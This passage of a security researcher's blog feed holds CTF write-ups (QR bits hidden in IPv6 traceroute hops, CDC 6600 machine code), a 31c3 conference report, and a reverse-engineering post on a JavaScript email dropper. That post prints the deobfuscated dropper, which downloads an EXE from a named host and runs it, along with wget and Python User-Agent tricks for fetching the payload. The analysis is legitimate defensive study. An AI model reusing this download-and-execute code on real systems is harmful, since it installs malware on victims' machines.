screenshot that told us the flag is &lt;cite&gt;flag{have_a_wonderful_starcrafts}&lt;/cite&gt;. Hooray,
150 points!&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2015/0417/flag.jpg" /&gt;&lt;/p&gt;
</content><category term="CTF"></category><category term="CTF"></category><category term="PlaidCTF"></category><category term="file formats"></category></entry><entry><title>0CTF: treasure</title><link href="/blog/2015/0330-0ctf-treasure.html" rel="alternate"></link><published>2015-03-30T02:00:00-04:00</published><updated>2015-03-30T02:00:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2015-03-30:/blog/2015/0330-0ctf-treasure.html</id><summary type="html">&lt;p&gt;We are told that there's a treasure waiting at &lt;cite&gt;treasure.ctf.0ops.sjtu.cn&lt;/cite&gt;
so we have to start digging!&lt;/p&gt;
&lt;p&gt;Firing up dig: &lt;cite&gt;dig treasure.ctf.0ops.sjtu.cn -t ANY&lt;/cite&gt; tells us that the target is an IPv6 address.&lt;/p&gt;
&lt;p&gt;Let's do a traceroute to that address:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
$ traceroute6 treasure.ctf …&lt;/pre&gt;</summary><content type="html">&lt;p&gt;We are told that there's a treasure waiting at &lt;cite&gt;treasure.ctf.0ops.sjtu.cn&lt;/cite&gt;
so we have to start digging!&lt;/p&gt;
&lt;p&gt;Firing up dig: &lt;cite&gt;dig treasure.ctf.0ops.sjtu.cn -t ANY&lt;/cite&gt; tells us that the target is an IPv6 address.&lt;/p&gt;
&lt;p&gt;Let's do a traceroute to that address:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
$ traceroute6 treasure.ctf.0ops.sjtu.cn
...
25  0000000110001101110000000 (2001:470:d:b28::14:2)  79.101 ms  78.517 ms  74.130 ms
26  0111110111100111110111110 (2001:470:d:b28::15:2)  79.776 ms  74.481 ms  79.247 ms
27  0100010110001100110100010 (2001:470:d:b28::16:2)  73.597 ms  78.433 ms  88.964 ms
28  0100010101000011010100010 (2001:470:d:b28::17:2)  89.942 ms  88.982 ms  89.823 ms
29  0100010101010101110100010 (2001:470:d:b28::18:2)  88.834 ms  89.702 ms  92.050 ms
30  0111110110011011010111110 (2001:470:d:b28::19:2)  91.862 ms  79.223 ms  79.132 ms
&lt;/pre&gt;
&lt;p&gt;These look like bit patterns. But unfortunately traceroute stops after 30
hops. So let's resolve the remaining entries as well until we reach the
target address (we see a linearly increasing pattern in the addresses).&lt;/p&gt;
&lt;p&gt;Let's continue with a reverse lookup (dig -x) on the remaining IPv6
addresses and we get the following bit patterns:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
0000000110001101110000000 14
0111110111100111110111110 15
0100010110001100110100010 16
0100010101000011010100010 17
0100010101010101110100010 18
0111110110011011010111110 19
0000000101010101010000000 20
1111111110111100111111111 21
0011100010001010011100111 22
0100011011001101101000000 23
0101010000111110110010100 24
0011111011010110011010101 25
1001010100000111010010000 26
0001111100000101001010110 27
0110110100110010110100000 28
0100101001101111101000010 29
0110100101100000000001010 30
1111111100111011011101001 31
0000000101101110010101100 32
0111110101111100011100110 33
0100010110011010000001101 34
0100010111011101000011000 35
0100010110010110111010010 36
0111110100101111000010110 37
0000000100000010010100110 38
&lt;/pre&gt;
&lt;p&gt;After unsuccessfully trying a gazillion of 5, 6, and 8-bit encodings we saw a
pattern: at the top left there's a box of 1's (as at the lower left and upper
right). So this actually looks like a QR code.&lt;/p&gt;
&lt;p&gt;Dumping the bits into a file and hacking together a python script that
generates an image allows us to decode the QR code using a mobile QR
decoder app. This results in the flag and 50 points.&lt;/p&gt;
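&lt;p&gt;The image generation boils down to a few lines (my sketch of it): scale every
bit up and emit a plain PBM, where a 1 conveniently is a black pixel, just like
a dark QR module:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
def bits_to_pbm(rows, scale=8):
    # rows is a list of equal-length '0'/'1' strings, one per QR row
    w = len(rows[0]) * scale
    h = len(rows) * scale
    out = ['P1', '%d %d' % (w, h)]
    for row in rows:
        line = ' '.join(ch for ch in row for _ in range(scale))
        for _ in range(scale):
            out.append(line)
    return '\n'.join(out) + '\n'
&lt;/pre&gt;
&lt;p&gt;Writing the 25 bit strings above through this function into a .pbm file yields
an image that any viewer (and QR scanner) can handle.&lt;/p&gt;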
</content><category term="CTF"></category><category term="CTF"></category><category term="0CTF"></category><category term="network"></category></entry><entry><title>Reversing JS email malware</title><link href="/blog/2015/0208-EMail-Malware.html" rel="alternate"></link><published>2015-02-08T10:00:00-05:00</published><updated>2015-02-08T10:00:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2015-02-08:/blog/2015/0208-EMail-Malware.html</id><summary type="html">&lt;p&gt;Another lazy Sunday (oh well, actually I should be writing papers and grant
proposals but we are not talking about that right now) and I'm scrolling through
my email when I stumbled upon a &amp;quot;FedEx notice&amp;quot; with your usual &amp;quot;you have not
picked up your package&amp;quot; scam and I figured …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Another lazy Sunday (oh well, actually I should be writing papers and grant
proposals but we are not talking about that right now) and I'm scrolling through
my email when I stumbled upon a &amp;quot;FedEx notice&amp;quot; with your usual &amp;quot;you have not
picked up your package&amp;quot; scam and I figured I'd give it a closer look.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2015/0208/email.png" /&gt;&lt;/p&gt;
&lt;p&gt;Hm, a zip archive as attachment, now that's suspicious. Extracting this fancy
file we see that it contains a &lt;em&gt;00000528789.doc.js&lt;/em&gt; file. The JavaScript
file is somewhat obfuscated. Running it through a pretty printer and searching
for the decode function (function jdb() in this case) we get to the actual
JavaScript code that would have been executed if I had been running a Windows
machine, opened the ZIP archive, and naively clicked on it:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
function dl(fr, fn, rn) {
    var ws = new ActiveXObject(&amp;quot;WScript.Shell&amp;quot;);
    var fn = ws.ExpandEnvironmentStrings(&amp;quot;%TEMP%&amp;quot;) + String.fromCharCode(92) + fn;
    var xo = new ActiveXObject(&amp;quot;MSXML2.XMLHTTP&amp;quot;);
    xo.onreadystatechange = function() {
        if (xo.readyState === 4) {
            var xa = new ActiveXObject(&amp;quot;ADODB.Stream&amp;quot;);
            xa.open();
            xa.type = 1;
            xa.write(xo.ResponseBody);
            xa.position = 0;
            xa.saveToFile(fn, 2);
            xa.close();
        };
    };
    try {
        xo.open(&amp;quot;GET&amp;quot;, fr, false);
        xo.send();
        if (rn &amp;gt; 0) {
            ws.Run(fn, 0, 0);
        };
    } catch (er) {};
};
dl(&amp;quot;http://eurotechgermancarservice.com/document.php?id=5452555E0905100C0D05174A14051D0116240A01060108130108104A0A0110&amp;amp;rnd=6442141&amp;quot;, &amp;quot;65813032.exe&amp;quot;, 1);
&lt;/pre&gt;
&lt;p&gt;Well, this really looks like a dropper to me, let's grab that EXE and see what
we find. Sadly, the file is empty if we try to grab it via wget:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 08 Feb 2015 15:42:47 GMT
Content-Length: 0
&lt;/pre&gt;
&lt;p&gt;Let's see if we can grab it by using a different User-Agent:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
wget --user-agent=&amp;quot;User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12&amp;quot; -c &amp;quot;http://eurotechgermancarservice.com/document.php?id=5452555E0905100C0D05174A14051D0116240A01060108130108104A0A0110&amp;amp;rnd=6442141&amp;quot;
&lt;/pre&gt;
&lt;p&gt;Success! We get a 140KB executable that would have been downloaded from the
JavaScript program and then executed.&lt;/p&gt;
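&lt;p&gt;For scripting bulk downloads, the same User-Agent trick is a few lines of
(modern) Python; the helper below is my sketch, not part of the original
analysis:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
import urllib.request

UA = ('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) '
      'Gecko/20101026 Firefox/3.6.12')

def build_request(url, ua=UA):
    # Some droppers only serve the payload to browser-looking clients.
    return urllib.request.Request(url, headers={'User-Agent': ua})

# payload = urllib.request.urlopen(build_request(dropper_url)).read()
&lt;/pre&gt;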
&lt;p&gt;My first hope was that the rnd parameter at the end of the string would be used
for some explicit randomization to diversify the different binaries (as we
proposed in &lt;a class="reference external" href="https://nebelwelt.net/publications/files/14SyScan-presentation.pdf"&gt;SyScan&lt;/a&gt; and in &lt;a class="reference external" href="https://nebelwelt.net/publications/files/14SyScan.pdf"&gt;our
technical report&lt;/a&gt;). But the rnd
parameter is only used as key, allowing the EXE download only if the key
matches. I found some alternating keys that matched as well but all the
executables had the same SHA hash.&lt;/p&gt;
&lt;p&gt;Now, sending the file off to
&lt;a class="reference external" href="https://www.virustotal.com/en/file/5554f9f152b14653740715eb27a0d013dbe9f6742cefb98005d54d339fd74161/analysis/1423410333/"&gt;VirusTotal&lt;/a&gt;
tells me that the sample I got is still fresh:&lt;/p&gt;
&lt;p&gt;&lt;img alt="image1" src="/blog/static/2015/0208/virustotal.png" /&gt;&lt;/p&gt;
&lt;p&gt;The binary is stripped pei-i386, uses a couple of Windows DLLs, and seems to
drop itself into VCjpeg.exe at one point in time. As I don't have a Windows
machine to play around at the moment I'll leave it at that and close my
investigation.&lt;/p&gt;
&lt;div class="section" id="addendum"&gt;
&lt;h2&gt;Addendum:&lt;/h2&gt;
&lt;p&gt;Looks like the file is changing and is being rediversified. Independent of the
key used, a new binary pops up every couple of minutes. So just wait for a while
and you get a new sample (uploaded to &lt;a class="reference external" href="https://www.virustotal.com/en/file/807b105040c30b83282802397a463506ca4196b2a345ba1ff57f0396feccd834/analysis/1423411812/"&gt;VirusTotal: 1/56&lt;/a&gt;).&lt;/p&gt;
&lt;/div&gt;
</content><category term="Security"></category><category term="malware"></category><category term="reversing"></category><category term="security"></category></entry><entry><title>31c3 - A New Dawn</title><link href="/blog/2014/1230-31c3.html" rel="alternate"></link><published>2014-12-30T16:00:00-05:00</published><updated>2014-12-30T16:00:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2014-12-30:/blog/2014/1230-31c3.html</id><summary type="html">&lt;div class="section" id="another-year-another-c3"&gt;
&lt;h2&gt;Another year, another c3&lt;/h2&gt;
&lt;p&gt;This year marked my 11th year of congress (and 10th visit with a short hiatus in
2012). Just like all the years before we headed to the conference location a day
before the start of the 31c3. After arriving in Hamburg (after a quick detour
through …&lt;/p&gt;&lt;/div&gt;</summary><content type="html">&lt;div class="section" id="another-year-another-c3"&gt;
&lt;h2&gt;Another year, another c3&lt;/h2&gt;
&lt;p&gt;This year marked my 11th year of congress (and 10th visit with a short hiatus in
2012). Just like all the years before we headed to the conference location a day
before the start of the 31c3. After arriving in Hamburg (after a quick detour
through the Lufthansa lounge in Frankfurt with super decent food) we checked in
at the hostel and headed to the CCH, the conference location. After Lumi got her
ticket we headed in and explored the assembly area where a lot of fancy stuff
was already set up.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2014/1230/31c3-deco.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;While there were tons of awesome art projects, old gaming machines, and other
fancy decoration we felt that cozy seating areas were missing. In the last
couple of years we loved to chill on the widely available couches. This year
there were only a few couches available and there was usually a super long wait
to score some. But then again, the congress is facing exponential growth (Club
of Rome anyone?) and is now at more than 12,000 attendees (up from around 3,000
attendees 4 years ago); there's just no more space available.&lt;/p&gt;
&lt;p&gt;The 5 talks I appreciated most are:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Iridium Pager Hacking -- Sec, schneider&lt;/li&gt;
&lt;li&gt;Mining for Bugs with Graph Database Queries -- fabs&lt;/li&gt;
&lt;li&gt;Thunderstrike: EFI bootkits for Apple MacBooks -- Trammell Hudson&lt;/li&gt;
&lt;li&gt;The Perl Jam: Exploiting a 20 Year-old Vulnerability -- Netanel Rubin&lt;/li&gt;
&lt;li&gt;Why are computers so &amp;#64;#!*, and what can we do about it? -- Peter Sewell&lt;/li&gt;
&lt;li&gt;and obviously my talk on Code-Pointer Integrity...&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="section" id="wir-beteiligen-uns-aktiv-an-den-diskussionen-martin-haase"&gt;
&lt;h2&gt;Wir beteiligen uns aktiv an den Diskussionen -- Martin Haase&lt;/h2&gt;
&lt;p&gt;This was the first talk I watched and maha was awesome as always discussing fine
lines of political arguments and how you can guide and lead the willing
audience.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="scada-strangelove-too-smart-grid-in-da-cloud-sergey-gordeychik-aleksandr-timorin"&gt;
&lt;h2&gt;SCADA StrangeLove: Too Smart Grid in da Cloud --  Sergey Gordeychik, Aleksandr Timorin&lt;/h2&gt;
&lt;p&gt;From the soft-skill talk by maha we moved on to a more technical talk about the
continuously bad shape of SCADA systems, including many nice details on their
insecurities and how to pwn these systems.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="glitching-for-n00bs-exide"&gt;
&lt;h2&gt;Glitching For n00bs -- exide&lt;/h2&gt;
&lt;p&gt;Some details on voltage glitching, playing with frequency shifts, and so on to
get around ROM limitations and force specific execution patterns. A nice
introduction to glitching but nothing earth shattering.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="code-pointer-integrity-gannimo"&gt;
&lt;h2&gt;Code Pointer Integrity -- gannimo&lt;/h2&gt;
&lt;p&gt;My talk on &lt;a class="reference external" href="https://nebelwelt.net/publications/files/14CCC-presentation.pdf"&gt;Code-Pointer Integrity&lt;/a&gt;,
a defense mechanism we developed to protect low level code written in C or C++
against control-flow hijack attacks.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="amd-x86-smu-firmware-analysis-rudolf-marek"&gt;
&lt;h2&gt;AMD x86 SMU firmware analysis -- Rudolf Marek&lt;/h2&gt;
&lt;p&gt;There are bugs in low level firmwares, who would have thought?&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="crypto-tales-from-the-trenches"&gt;
&lt;h2&gt;Crypto Tales from the Trenches&lt;/h2&gt;
&lt;p&gt;This panel, led by Nadia Heninger, featured a bunch of journalists (Julia Angwin,
Laura Poitras, Jack Gillum) and discussed how &amp;quot;real people&amp;quot; use crypto software
to protect themselves against governmental spying.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="citizenfour-laura-poitras"&gt;
&lt;h2&gt;Citizenfour -- Laura Poitras&lt;/h2&gt;
&lt;p&gt;This is the movie about the Edward Snowden leaks and how the leaked data was
exchanged. The movie sheds some more light on the person behind the leaks
and discusses some of the motivations. Great movie, go watch it!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="iridium-pager-hacking-sec-schneider"&gt;
&lt;h2&gt;Iridium Pager Hacking -- Sec, schneider&lt;/h2&gt;
&lt;p&gt;Sec and schneider reverse engineered the Iridium text message protocol and,
starting from a USRP setup, developed a way to capture all messages in an area
using a super cheap software-defined radio. It was especially interesting to
peek into their thought process and reverse engineering efforts to uncover the
protocol details and to decode the actual messages. This was
an awesome talk and I really enjoyed the workshop that they organized right
after the talk. I feel that I learned a lot (especially about gnuradio quirks).&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="mining-for-bugs-with-graph-database-queries-fabs"&gt;
&lt;h2&gt;Mining for Bugs with Graph Database Queries -- fabs&lt;/h2&gt;
&lt;p&gt;Fabs rehashed his Oakland'14 talk and added a bunch of fresh VLC bugs and a
longer discussion on the topic to make it more approachable to hackers. I really
appreciate that he open-sourced the full framework and is super open to other
hackers playing with his graph search database. The idea is that you have a
super simple parser that churns through a bunch of code (without compiling it),
pipes it into a graph database, and lets you query for specific patterns on
a combined control-flow, program-dependence, and partial data-flow graph. Using
all these combined graphs you can formulate super complex queries that hint at
specific bugs and reduce the amount of code that you have to audit for 0days.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="fernvale-an-open-hardware-and-software-platform-based-on-the-nominally-closed-source-mt6260-soc-bunnie-xobs"&gt;
&lt;h2&gt;Fernvale: An Open Hardware and Software Platform, Based on the (nominally) Closed-Source MT6260 SoC -- bunnie, Xobs&lt;/h2&gt;
&lt;p&gt;Bunnie introduced their reverse engineering efforts into a super cheap ARM/GSM
hardware project. The talk was awesome and it is best if you watch it and read
his &lt;a class="reference external" href="http://www.bunniestudios.com/blog/?p=4297"&gt;blog post&lt;/a&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="the-matter-of-heartbleed-zakir-durumeric-and-heartache-and-heartbleed-the-insider-s-perspective-on-the-aftermath-of-heartbleed-nick-sullivan"&gt;
&lt;h2&gt;The Matter of Heartbleed -- Zakir Durumeric and Heartache and Heartbleed: The insider's perspective on the aftermath of Heartbleed -- Nick Sullivan&lt;/h2&gt;
&lt;p&gt;Awesome wrap-up of Heartbleed and how we analyzed and scanned a large part of
the internet to ensure that people actually patch the vulnerability. Great,
super compact talk by Zakir; you might also want to read the &lt;a class="reference external" href="https://nebelwelt.net/publications/files/14IMC.pdf"&gt;paper&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Nick then discussed the CloudFlare challenge that they did but surprisingly he
reformulated the challenge and presented CloudFlare in a much better light.
CloudFlare challenged hackers to try to exploit the vulnerability, and at the
time it sounded as if they were super sure that their allocator made the
vulnerability unexploitable, while in the talk Nick presented it as a
crowd-sourcing approach to find a working exploit. Anyways, the talk was
interesting to follow and allowed closure on heartbleed.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="fnord-news-show-frank-fefe"&gt;
&lt;h2&gt;Fnord News Show -- Frank, fefe&lt;/h2&gt;
&lt;p&gt;The Fnord news show was awesome as always. We enjoyed the show and -- as always
-- were surprised by all the crap that happened during the year. It is sad
what kind of atrocities the politicians get away with.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="emet-5-1-armor-or-curtain-rene-freingruber"&gt;
&lt;h2&gt;EMET 5.1 - Armor or Curtain? -- Rene Freingruber&lt;/h2&gt;
&lt;p&gt;Overview of EMET 5.1 and how you can break all of its defense mechanisms, like
ASLR, DEP, and different forms of canaries. The talk did not offer any surprises but
it was nice to get an overview of the exploit techniques he used (ROPing and
info-leaking away).&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="dp5-pir-for-privacy-preserving-presence-ian-goldberg-george-danezis-nikita-borisov"&gt;
&lt;h2&gt;DP5: PIR for Privacy-preserving Presence --  Ian Goldberg, George Danezis, Nikita Borisov&lt;/h2&gt;
&lt;p&gt;Talk on how to use private information retrieval and how to connect anonymous
(or semi-anonymous) entities for secure data exchange. This technique protects
against graph similarities and breaking (pseudo-)anonymity by correlating social
graphs.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="thunderstrike-efi-bootkits-for-apple-macbooks-trammell-hudson"&gt;
&lt;h2&gt;Thunderstrike: EFI bootkits for Apple MacBooks -- Trammell Hudson&lt;/h2&gt;
&lt;p&gt;Exploiting and pwning the firmware of your MacBook using a 2 year old bug and a
20 year old legacy feature, connecting a malicious device to the Thunderbolt PCI
bus, intercepting the boot process and injecting your own code into the
firmware, circumventing all Apple verification. Existing devices will always be
vulnerable to downgrade attacks, newer devices can be protected (by not exposing
vulnerable older firmwares).&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="the-perl-jam-exploiting-a-20-year-old-vulnerability-netanel-rubin"&gt;
&lt;h2&gt;The Perl Jam: Exploiting a 20 Year-old Vulnerability -- Netanel Rubin&lt;/h2&gt;
&lt;p&gt;Awesome talk on lists in perl and how they can be used to overwrite arguments in
functions when they are expanded. This is a must-watch, partly for the explicit
language, the awesome camel pictures, and all the great WATs.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="unhash-methods-for-better-password-cracking-tonimir-kisasondi"&gt;
&lt;h2&gt;UNHash - Methods for better password cracking -- Tonimir Kisasondi&lt;/h2&gt;
&lt;p&gt;The search space for long passwords is huge, Tonimir looked at specific ways to
guide the search to reap some low-hanging fruit and find longer passwords
faster. He looked at password leaks, studied how humans construct passwords
from different forms of combinations, and explicitly targeted such passwords
using dedicated word lists.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="infocalypse-now-p0wning-stuff-is-not-enough-walter-van-holst"&gt;
&lt;h2&gt;Infocalypse now: P0wning stuff is not enough -- Walter van Holst&lt;/h2&gt;
&lt;p&gt;Walter presented a very meta talk on the infocalypse.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="why-are-computers-so-and-what-can-we-do-about-it-peter-sewell"&gt;
&lt;h2&gt;Why are computers so &amp;#64;#!*, and what can we do about it? -- Peter Sewell&lt;/h2&gt;
&lt;p&gt;Awesome talk by Peter taking us on a wild ride through 60 years of abstractions
in computer architecture, building layer upon layer of the software stack,
featuring memory coherency questions and arguing in favor of verified
interfaces. All layers should be verified, formally proven, and protected at all
times. He is interested in coming up with formal descriptions of the interfaces
that are amenable to testing and can actually be used in practice.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="state-of-the-onion-jacob-arma"&gt;
&lt;h2&gt;State of the Onion -- Jacob, arma&lt;/h2&gt;
&lt;p&gt;Jacob and arma presented the current status of the Tor project, discussing the
growth in bandwidth, governmental attacks, and the other kinds of quirks that
the Tor project faces on a daily basis.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="missed-talks"&gt;
&lt;h2&gt;Missed talks&lt;/h2&gt;
&lt;p&gt;Due to overcrowding I was unable to watch the following talks. I heard great
things about all of them, and they are on my watch list for my next couple of
flights:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Practical EMV PIN interception and fraud detection -- Andrea Barisani&lt;/li&gt;
&lt;li&gt;Revisiting SSL/TLS Implementations -- Sebastian Schinzel&lt;/li&gt;
&lt;li&gt;SS7: Locate. Track. Manipulate. -- Tobias Engel&lt;/li&gt;
&lt;li&gt;ECCHacks -- djb, Tanja Lange&lt;/li&gt;
&lt;li&gt;Beyond PNR: Exploring airline systems -- saper&lt;/li&gt;
&lt;li&gt;Security Analysis of Estonia's Internet Voting System -- J. Alex Halderman&lt;/li&gt;
&lt;li&gt;Preserving arcade games -- Ange Albertini&lt;/li&gt;
&lt;li&gt;Attacks on UEFI security, inspired by Darth Venamis's misery and Speed Racer --  Rafal Wojtczuk, Corey Kallenberg&lt;/li&gt;
&lt;li&gt;CAESAR and NORX --  Philipp Jovanovic, aumasson&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="section" id="good-bye-31c3"&gt;
&lt;h2&gt;Good bye 31c3&lt;/h2&gt;
&lt;p&gt;It was a pleasure, good bye Hamburg, and see you next year!&lt;/p&gt;
&lt;p&gt;&lt;img alt="image1" src="/blog/static/2014/1230/31c3-bye.jpg" /&gt;&lt;/p&gt;
&lt;/div&gt;
</content><category term="Conferences"></category><category term="security"></category><category term="congress"></category><category term="31c3"></category><category term="ccc"></category><category term="privacy"></category></entry><entry><title>Ghost in the Shellcode Teaser 2015: Lost To Time</title><link href="/blog/2014/1213-GitS-LostToTime.html" rel="alternate"></link><published>2014-12-13T19:39:00-05:00</published><updated>2014-12-13T19:39:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2014-12-13:/blog/2014/1213-GitS-LostToTime.html</id><summary type="html">&lt;p&gt;We received a file that looked like it was compressed. Let's just pipe it
through xz and see what it really is. Aaah, looks like some old and obscure
machine code of a machine that has long since been retired.&lt;/p&gt;
&lt;p&gt;The machine code is of the CDC 6600, a very …&lt;/p&gt;</summary><content type="html">&lt;p&gt;We received a file that looked like it was compressed. Let's just pipe it
through xz and see what it really is. Aaah, looks like some old and obscure
machine code of a machine that has long since been retired.&lt;/p&gt;
&lt;p&gt;The machine code is for the CDC 6600, a very weird machine that has a set of
24 registers: address registers (A0-A7), index registers (B0-B7), and arithmetic
registers (X0-X7). The ISA is kind of RISC-like with some weird quirks.&lt;/p&gt;
&lt;p&gt;The address width is 18 bits and there are 60 bits in a word (which is the
access granularity). I'm not entirely sure about the endianness but it worked
out either way.&lt;/p&gt;
&lt;p&gt;Individual A and X registers are coupled, i.e., if an address is written into
A{1-5} then an implicit memory load into X{1-5} happens (and writing into A6 or
A7 triggers an implicit store of X6 or X7). A0 and X0 are scratch registers, B0
is hardwired to 0 (cheap bastards), and B1 contains 1 by convention (seems like
a waste of a register to me).&lt;/p&gt;
&lt;p&gt;Interestingly the machine does not use ASCII characters but the following
table:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
XXX 000 001 010 011 100 101 110 111
000   :   A   B   C   D   E   F   G
001   H   I   J   K   L   M   N   O
010   P   Q   R   S   T   U   V   W
011   X   Y   Z   0   1   2   3   4
100   5   6   7   8   9   +   -   *
101   \   (   )   $   =       ,   .
110   #   [   ]   %   &amp;quot;   _   !   &amp;amp;
111   '   ?   &amp;lt;   &amp;gt;   &amp;#64;   \   ^   ;
&lt;/pre&gt;
&lt;p&gt;When we start looking at the assembly code we see that there are two
functions: CTF, which initializes a set of registers and addresses, and CTF2,
which is basically a loop through the raw data region at the end of the file.&lt;/p&gt;
&lt;p&gt;The initialization looks as follows:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
CTF      BSS       0
         SB1       1                   B1 = 1
         SA1       CTFB                A1 = &amp;amp;CTFB, X1 = *CTFB
         BX6       X1                  X6 = X1
         SB7       27                  B7 = 27
         SA6       A1                  A6 = &amp;amp;CTFB, *CTFB = X6
         SA2       CTFA                A2 = &amp;amp;CTFA, X2 = *CTFA
         MX0       30                  X0 = 30 bit mask of 1 from top
         SA1       A2+B1               A1 = A2+1 = CTFA+1, X1= *(CTFA+1)
&lt;/pre&gt;
&lt;p&gt;The CTF2 loop looks as follows:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
CTF2     BX6       X0*X1               X6 = X0 AND X1 (clear lower 30bit)
         ZR        X6,CTF4             X6 = 0 ? CTF4
         JR        FCT                 call FCT
         SA6       A6+B1               A6 = A6 + 1; *(A6+1) = X6
         BX6       -X0*X1              X6 = -X0 AND X1 (inverted X0)
         ZR        X6,CTF4             X6 = 0 ? CTF4
         JR        FCT                 call FCT
         SA6       A6+B1               A6 = A6 + 1; *(A6+1) = X6
         SA1       A1+B1               A1 = A1 + 1; X1 = *(A1+1)
         NZ        X1,CTF2
&lt;/pre&gt;
&lt;p&gt;CTF2 loads a word and processes the top 30 bits first, then the lower 30
bits. For each half word, CTF2 calls a subroutine that either just counts the
number of set bits or looks at the first word in the buffer and shifts it right
to extract a special character for extra fun.&lt;/p&gt;
&lt;p&gt;The FCT subroutine looks as follows:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
FCT      SUBR
         CX6       X6                  X6 = number of 1's in X6
         SB6       X6                  B6 = X6
         LT        B6,B7,FCT2          B6 &amp;lt; B7? goto FCT2
         SB6       B6-B7               B6 = B6 - B7
         SB6       B6+B6               B6 = 2*B6 &amp;lt; 2 B6
         SB5       B6+B6               B5 = 2*B6 &amp;lt; 4 B6
         SB5       B5+B5               B5 = 2*B5 &amp;lt; 8 B6
         SB6       B5+B6               B6 = B5+B6 &amp;lt; 10 B6
         AX6       X2,B6               X6 = X2 &amp;gt;&amp;gt; B6
         MX7       -10                 X7 = 53 bit mask of 1 from top 110101=53
         BX6       -X7*X6              X6 = last 7 bits
FCT2     JP        FCTX
&lt;/pre&gt;
&lt;p&gt;If the number of 1 bits in the 30-bit half word is lower than 27 then we just
print the character. If it is 28 to 30 then we compute (nrbits-27)*10, shift the
first word of memory that many bits to the right, and store the result as a
character.&lt;/p&gt;
&lt;p&gt;Note that the loop skips data word 0 and starts processing from word 1 on.
But data word 0 is used to encode the two parentheses ( ) in the flag.&lt;/p&gt;
&lt;p&gt;So the algorithm is as follows: for each 60-bit word, first look at the higher
30 bits, count the set bits, and use the lookup table above to decode the
character. Then do the same for the lower 30 bits.&lt;/p&gt;
&lt;p&gt;Now let's look at the data block:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
0000000052 0244120057  3=C  9=I // 0 address, ignored
4021000310 0774415040  6=F 12=L
0000040000 0442211001  1=A  7=G
7777677777 0010002004 29=2=20; 520244&amp;gt;&amp;gt;2= 0.101.001_00 = 051 = ( 3=C
7737757761 0040000400 25=Y  2=B
0010020034 3556115671  5=E 18=R
0000000444 1625031752  3=C 15=O
6301523622 7165273762 14=N 20=T
2716771305 7111504353 18=R 15=O
1420532413 0006000100 12=L  3=C
6777567373 6000000000 25=Y  2=B
1000700020 4666666661  5=E 18=R
1001001001 0002000000  4=D  1=A
3567107765 0001000000 20=T  1=A
7000000000 7677737566  3=C 25=Y
4000000004 4000700004  2=B  5=E
5713542707 2000400010 18=R  3=C
5471065072 2667170671 15=O 18=R
3750335406 1653521704 16=P 15=O
6753156470 0000000004 18=R  1=A
1234567767 4127002011 20=T  9=I
2731534064 7003653700 15=O 14=N
77777777770000000000B 30=3=30; 052 = )
00000000000000000055B
&lt;/pre&gt;
&lt;p&gt;And we get the flag: FLAG(CYBERCONTROLCYBERDATACYBERCORPORATION)&lt;/p&gt;
&lt;p&gt;You can find some more information at &lt;a class="reference external" href="http://en.wikipedia.org/wiki/CDC_6600"&gt;Wikipedia&lt;/a&gt;, &lt;a class="reference external" href="http://ygdes.com/CDC/60100000D_6600refMan_Feb67.pdf"&gt;ISA manual&lt;/a&gt; or
&lt;a class="reference external" href="http://people.cs.clemson.edu/~mark/subroutines/cdc6600.html"&gt;Subroutines&lt;/a&gt;.&lt;/p&gt;
